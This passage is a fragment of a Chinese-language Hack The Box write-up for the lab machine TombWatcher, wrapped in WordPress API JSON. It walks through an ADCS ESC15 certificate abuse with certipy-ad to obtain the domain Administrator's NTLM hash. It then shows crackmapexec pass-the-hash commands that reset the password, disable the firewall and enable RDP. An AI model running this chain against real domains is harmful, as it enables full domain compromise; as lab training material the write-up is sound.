src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749607389379-769c84ee-e3f1-4634-a386-0d1504719822.png\" alt=\"\" \/><\/p>\n<p>\u968f\u540e\u5c1d\u8bd5\u4f7f\u7528<code>certipy-ad<\/code>\u67e5\u627e\u5176\u8bc1\u4e66\u914d\u7f6e\u6f0f\u6d1e\uff1a<\/p>\n<pre><code class=\"language-powershell\">certipy-ad find -dc-ip 10.129.240.166 -u cert_admin@tombwatcher.htb -p \"Asd310056\" -vulnerable -stdout<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749607643463-0ec64882-b8a9-4ea3-a2de-7343faca2f77.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0<code>cert_admin<\/code>\u7528\u6237\u5b58\u5728<code>ADCS ESC15<\/code>\u8bc1\u4e66\u914d\u7f6e\u6f0f\u6d1e\uff01<\/p>\n<h2>ADCS ESC15\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u5728\u5f00\u59cb\u524d\uff0c\u67e5\u770b<code>ADCS ESC15<\/code>\u6f0f\u6d1e\u7684\u5229\u7528\u65b9\u5f0f\uff1a<a href=\"https:\/\/github.com\/ly4k\/Certipy\/wiki\/06-%E2%80%90-Privilege-Escalation#esc15-arbitrary-application-policy-injection-in-v1-templates-cve-2024-49019-ekuwu\" target=\"_blank\"  rel=\"nofollow\" >06 \u2010 Privilege Escalation \u00b7 ly4k\/Certipy Wiki<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749608105773-75fd122a-ce44-4d62-b071-64605da017f7.png\" alt=\"\" \/><\/p>\n<p>\u9996\u5148\uff0c\u4f7f\u7528<code>certipy-ad<\/code>\u5de5\u5177\u8bf7\u6c42\u7528\u6237<code>cert_admin<\/code>\u7684\u8bc1\u4e66\uff08\u901a\u8fc7<code>WebServer<\/code>\u6a21\u677f\uff09\uff0c\u5e76\u5728\u8bc1\u4e66\u5185\u6dfb\u52a0<code>Certificate Request Agent<\/code>\u5e94\u7528\u7b56\u7565\u6807\u8bc6\uff1a<\/p>\n<pre><code class=\"language-shell\">certipy-ad req -u cert_admin -p \"Asd310056\" -dc-ip 10.129.11.4 -target dc01.tombwatcher.htb -ca tombwatcher-CA-1 -template \"WebServer\" -application-policies \"Certificate Request Agent\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749608593403-0539b5d5-21fe-4658-8b75-0c20fde18dfc.png\" alt=\"\" \/><\/p>\n<p>\u8bf7\u6c42\u6210\u529f\uff01\u63a5\u4e0b\u6765\u4f7f\u7528\u5177\u6709\u8bc1\u4e66\u8bf7\u6c42\u4ee3\u7406\u8eab\u4efd\u7684<code>cert_admin<\/code>\u8bc1\u4e66\uff0c\u5411\u8bc1\u4e66\u670d\u52a1\u8bf7\u6c42\u57df\u7ba1\u7406\u5458\u7684\u8bc1\u4e66\uff1a<\/p>\n<pre><code class=\"language-shell\">certipy-ad req -u cert_admin -p \"Asd310056\" -dc-ip 10.129.240.166 -target dc01.tombwatcher.htb -ca tombwatcher-CA-1 -template \"User\" -pfx cert_admin.pfx -on-behalf-of \"TOMBWATCHER\\Administrator\"<\/code><\/pre>\n<p>\u83b7\u53d6\u5230\u8bc1\u4e66\u540e\uff0c\u76f4\u63a5\u4f7f\u7528<code>certipy-ad<\/code>\u7684<code>auth<\/code>\u529f\u80fd\u53d1\u8d77<code>UnPAC<\/code>\u8bf7\u6c42\uff0c\u83b7\u53d6\u57df\u7ba1\u7406\u5458<code>NTLM<\/code>\u54c8\u5e0c\uff1a<\/p>\n<pre><code class=\"language-shell\">certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.240.166<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749608837625-3ec38a6e-d3f2-4f94-afed-dc564fc7847e.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u83b7\u5f97\u57df\u7ba1\u7406\u5458\u767b\u5f55\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u57df\uff1a<code>tombwatcher.htb<\/code><\/li>\n<li>\u7528\u6237\u540d\uff1a<code>Administrator<\/code><\/li>\n<li><code>NTLM<\/code>\u54c8\u5e0c\uff1a<code>f61db423bebe3328d33af26741afe5fc<\/code><\/li>\n<\/ul>\n<p>\u76f4\u63a5\u4f7f\u7528<code>crackmapexec<\/code>\u6267\u884c\u547d\u4ee4\uff0c\u91cd\u8bbe\u5bc6\u7801\u3001\u5173\u95ed\u9632\u706b\u5899\u5e76\u6253\u5f00\u8fdc\u7a0b\u684c\u9762\u670d\u52a1\uff1a<\/p>\n<pre><code class=\"language-shell\">crackmapexec smb dc01.tombwatcher.htb -d tombwatcher.htb -u \"Administrator\" -H \"f61db423bebe3328d33af26741afe5fc\" -x \"net user Administrator Asd310056 \/domain\"\ncrackmapexec smb dc01.tombwatcher.htb -d tombwatcher.htb -u \"Administrator\" -p \"Asd310056\" -x \"netsh advfirewall set allprofiles state off\"\ncrackmapexec smb dc01.tombwatcher.htb -d tombwatcher.htb -u \"Administrator\" -p \"Asd310056\" -x \"wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1\"<\/code><\/pre>\n<p>\u6700\u540e\u4f7f\u7528<code>xfreerdp<\/code>\u8fde\u63a5\u8fdc\u7a0b\u684c\u9762\uff1a<\/p>\n<pre><code class=\"language-shell\">xfreerdp \/v:dc01.tombwatcher.htb \/u:Administrator \/p:\"Asd310056\" \/size:1440x900<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749609170028-219f1c0d-8d6f-4669-b4e0-281a3ef19f68.png\" alt=\"\" \/><\/p>\n<p><strong>\u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n","protected":false},"excerpt":{"rendered":"<p>\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.129.97.234\uff08\u975e\u56fa\u5b9aIP\u5730\u5740\uff09 \u9898\u76ee\u51ed\u636e\uff1ahenry \/ H3nry_987TGV! \u4fe1\u606f\u6536\u96c6  &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[18,13],"tags":[],"class_list":["post-304","post","type-post","status-publish","format-standard","hentry","category-htb_season_8","category-windows_machine"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/304","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=304"}],"version-history":[{"count":2,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/304\/revisions"}],"predecessor-version":[{"id":306,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/304\/revisions\/306"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=304"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=304"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=304"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}